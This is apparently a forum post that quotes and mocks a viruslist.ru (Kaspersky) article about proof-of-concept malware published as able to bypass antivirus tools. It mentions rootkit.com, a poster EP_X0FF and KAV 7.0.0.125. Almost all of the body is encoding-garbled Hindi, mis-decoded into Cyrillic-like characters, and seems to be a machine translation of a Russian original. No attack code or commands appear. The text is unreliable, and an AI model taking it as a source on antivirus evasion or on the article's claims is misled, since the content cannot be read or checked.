www.viruslist.ru/analysis?pubid=204007553рд▓реЗрдЦ рд░реВрд╕реА рдореЗрдВ рд╣реИ, рд▓реЗрдХрд┐рди рдореБрдЭреЗ рдпрдХреАрди рд╣реИ рдХрд┐ рдЖрдк рдЕрдВрдЧреНрд░реЗрдЬреА рд╕рдВрд╕реНрдХрд░рдг рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВред
рдордЬрд╛ рдЖ рдЧрдпрд╛
VX рдЖрдХрд╛рд╢ рд╕реЗ
EP_X0FF / UG рдЙрддреНрддрд░
rootkit.comsmartov: рдПрдХ рд▓реЗрдЦ рдХреЗ рдЙрджреНрдзрд░рдг рд╡реЗ рдЕрдВрдд рдореЗрдВ рдмрд╛рдд рдХрд░рддреЗ рд╣реИрдВ
рд╣рд╛рд▓ рдХреЗ рд╡рд░реНрд╖реЛрдВ рдореЗрдВ, рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╕реНрдерд┐рддрд┐ рдЕрддреНрдпрдВрдд рдкреНрд░рд╛рд╕рдВрдЧрд┐рдХ рд░рд╣реА рд╣реИред рд╕рд╛рдЗрдмрд░ рдЕрдкрд░рд╛рдзрд┐рдпреЛрдВ (рдпрд╛ "рд╕рдлреЗрдж рдЯреЛрдкреА рдХреЗ рдкреАрдЫреЗ рдЫрд┐рдкрдиреЗ рд╡рд╛рд▓реЗ") рдХреЗ рд╡рд╛рддрд╛рд╡рд░рдг рд╕реЗ рдХреЛрдИ рдПрдХ рдХреЛрдб рдЕрд╡рдзрд╛рд░рдгрд╛ рд╡рд┐рдХрд╕рд┐рдд рдХрд░ рд░рд╣рд╛ рд╣реИ рдЬреЛ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗ рдЖрдзреБрдирд┐рдХ рд╕рд╛рдзрдиреЛрдВ рдХреЛ рджрд░рдХрд┐рдирд╛рд░ рдХрд░рддрд╛ рд╣реИ, рдФрд░ рдкреНрд░рдЧрддрд┐ рдХреА рджреЗрдЦрднрд╛рд▓ рдХреЗ рд░реВрдк рдореЗрдВ рдкреНрд░рдЪреНрдЫрдиреНрди рдЖрддреНрдо-рдкреАрдЖрд░ рдХреЗ рдкреНрд░рдпреЛрдЬрдиреЛрдВ рдХреЗ рд▓рд┐рдП, рдЗрд╕реЗ "рдЕрд╡рд╛рдВрдЫрдиреАрдп" рдХреЗ рд░реВрдк рдореЗрдВ рдкреНрд░рдХрд╛рд╢рд┐рдд рдХрд░рддрд╛ рд╣реИред рд╣рдо рдЬреЛрд░ рджреЗрддреЗ рд╣реИрдВ: рдирд┐рд╢реНрдЪрд┐рдд рд░реВрдк рд╕реЗ, рдЗрд╕ рддрд░рд╣ рдХреА рдЕрд╡рдзрд╛рд░рдгрд╛ рдореМрд▓рд┐рдХ рд░реВрдк рд╕реЗ undetectable рдирд╣реАрдВ рд╣реИ, рд▓реЗрдХрд┐рди рд╕реБрд░рдХреНрд╖рд╛рддреНрдордХ рдЙрдкрдХрд░рдгреЛрдВ рдХреЗ рдЬреНрдЮрд╛рдд рдХрд╛рд░реНрдпреЛрдВ рдХреЗ рдПрдХ рдпрд╛ рджреЛ-рдЪрд░рдг рдмрд╛рдИрдкрд╛рд╕ рдХреЗ рд╕реНрддрд░ рдкрд░ undetectable рд╣реИред рдпрджрд┐ рд╕реБрд░рдХреНрд╖рд╛ рддрдВрддреНрд░ рдЬреНрдЮрд╛рдд рд╣реЛ рддреЛ рдЗрд╕ рддрд░рд╣ рдХрд╛ рд╡рди-рд╕реНрдЯреЗрдк рдмрд╛рдИрдкрд╛рд╕ рдХрд░рдирд╛ рдХрд╛рдлреА рд╕рд░рд▓ рд╣реИред
рдЗрд╕ рддрд░рд╣ рдХреЗ рдкреНрд░рдХрд╛рд╢рди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рдПрдХ рдирд┐рд╢реНрдЪрд┐рдд рдкреНрд░рддрд┐рд╢рдд рдХрд╛ рдХрд╛рд░рдг рдмрдирддреЗ рд╣реИрдВ рдЬреЛ рдорд╛рд▓рд╡реЗрдпрд░ рдФрд░ рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рдХреЗ рдСрдкрд░реЗрдЯрд┐рдВрдЧ рд╕рд┐рджреНрдзрд╛рдВрддреЛрдВ рд╕реЗ рдкрд░рд┐рдЪрд┐рдд рдирд╣реАрдВ рд╣реИрдВ, рдЪрд┐рдВрддрд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП ("рдХреНрдпрд╛ рдореЗрд░рд╛ рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рдЙрдкрдХрд░рдг рдЗрд╕ рдирдП рдкреНрд░рдХрд╛рд░ рдХреЗ рдЦрддрд░реЗ рд╕реЗ рдмрдЪрд╛рддрд╛ рд╣реИ?")ред рдРрд╕реА рд╕реНрдерд┐рддрд┐ рдореЗрдВ, рд╕реБрд░рдХреНрд╖рд╛рддреНрдордХ рдЙрдкрдХрд░рдгреЛрдВ рдХреЗ рдирд┐рд░реНрдорд╛рддрд╛ рдХреЗрд╡рд▓ рдЕрдкрдиреА рд╡рд┐рд╢реНрд╡рд╕рдиреАрдпрддрд╛ рдХреЛ рдмрд╣рд╛рд▓ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╕рдВрд╕рд╛рдзрдиреЛрдВ рдХрд╛ рд╣рд┐рд╕реНрд╕рд╛ рдлреЗрдВрдХ рд╕рдХрддреЗ рд╣реИрдВ: рд╡рд░реНрдгрд┐рдд рдЕрд╡рдзрд╛рд░рдгрд╛ рдХреЛ рджрд░рдХрд┐рдирд╛рд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдкреНрд░реМрджреНрдпреЛрдЧрд┐рдХрд┐рдпреЛрдВ рдХреЛ рд╡рд┐рдХрд╕рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдЖрдорддреМрд░ рдкрд░ рдЕрд╡рдзрд╛рд░рдгрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рд╣реА - рдПрдХ-рдЪрд░рдгред рдирддреАрдЬрддрди, рдкреНрд░рд╛рдзрд┐рдХрд░рдг рдХреЛ рдмрд╣рд╛рд▓ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ (рд▓реЗрдХрд┐рди рдФрд░ рдХреИрд╕реЗ?), рд╕рд┐рд╕реНрдЯрдо "рдореИрд▓рд╡реЗрдпрд░ - рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ - рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛" рдЕрдкрдиреА рдореВрд▓ рд╕реНрдерд┐рддрд┐ рдореЗрдВ рдЖрддрд╛ рд╣реИ, рдФрд░ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдПрдХ рд▓реВрдк рдореЗрдВ рдмрдВрдж рд╣реЛ рдЬрд╛рддреА рд╣реИред рдЗрд╕рдХреЗ рдкреНрд░рддреНрдпреЗрдХ рдирдП рдкреБрдирд░рд╛рд╡реГрддреНрддрд┐рдпреЛрдВ рдореЗрдВ рддреЗрдЬреА рд╕реЗ рдкрд░рд┐рд╖реНрдХреГрдд рдореИрд▓рд╡реЗрдпрд░ рдФрд░ рддреЗрдЬреА рд╕реЗ рднрд╛рд░реА рд╕реБрд░рдХреНрд╖рд╛ рдЙрдкрдХрд░рдг рдЙрддреНрдкрдиреНрди рд╣реЛрддреЗ рд╣реИрдВред
рдЬреИрд╕рд╛ рдХрд┐ KVN рдореЗрдВ рдерд╛: "рдорд╣рд╛рди рдпреЛрдЬрдирд╛!"ред рдЗрд╕ рддрд░рд╣ рдХреЗ рдЕрд╕рддреНрдп рд╕реНрд╡рдпрдВ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреЛ рдкреНрд░рдХрд╛рд╢рд┐рдд рдХрд░рддреЗ рд╣реИрдВ, рдФрд░ рдЗрд╕ рд╡рдЬрд╣ рд╕реЗ, рдЦрд░рд╛рдм-рд╡рд┐рдХрдЯ рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рдирд┐рд░реНрдорд╛рддрд╛рдУрдВ рдХреЛ рдПрдХ рдирдпрд╛ рдмреЗрд╣рддрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рд╡рд┐рдХрд╕рд┐рдд
рдХрд░рдиреЗ рдФрд░ рдЙрдиреНрд╣реЗрдВ рдареАрдХ
рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ
рдЧреЛрднреА рдХреЗ рдмрд╛рд▓ рдХрдЯрд╡рд╛рдиреЗ рд╕реЗ рджреВрд░ рд╣реЛрдирд╛ рдкрдбрд╝рддрд╛ рд╣реИред
ps рд╕рдмрд╕реЗ рдЕрдзрд┐рдХ рд╕реНрдерд╛рдкрд┐рдд KAV 7.0.0.125 ...